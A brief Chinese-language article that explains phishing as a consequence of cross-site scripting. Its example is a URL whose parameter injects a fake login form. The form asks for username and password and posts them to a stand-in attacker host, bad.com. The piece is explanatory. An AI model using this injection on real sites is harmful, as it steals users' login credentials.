cross-site scripting 最直接的危害就是“phishing”,所以写篇文章来介绍一下这个新词汇。
什么是 phishing?
phishing是一种把社会工程和技术手段兼而用之,偷取消费者个人身份信息和财务帐户信息的手段。
如何 phishing?
phish 的示例代码
http://www.good.com/index.asp?info=<form method=”POST” name=”Form1″><div style=”position:absolute;top:1024;left:1024;”><table cellpadding=”5″ cellspacing=”5″ width=”400″ bgcolor=”white” height=”300″><tr><td valign=”top”><p><p><p><BR><b><font color=”red”>Please Login and update your phone number.</font><BR>We cannot complete your order until your current phone number is on record.</font></b><br><br><b>User Login</b><br><br><b>Username:</b><BR><input type=”text” id=”UserName” name=”UserName”><P><B>Password:</b><BR><input type=”password” id=”UserPassword” name=”UserPassword”><P><input type=”button” value=”Login” onclick=”document.Form1.action=’http://www.bad.com’;submit();”></td></tr></table></div></form>
相关链接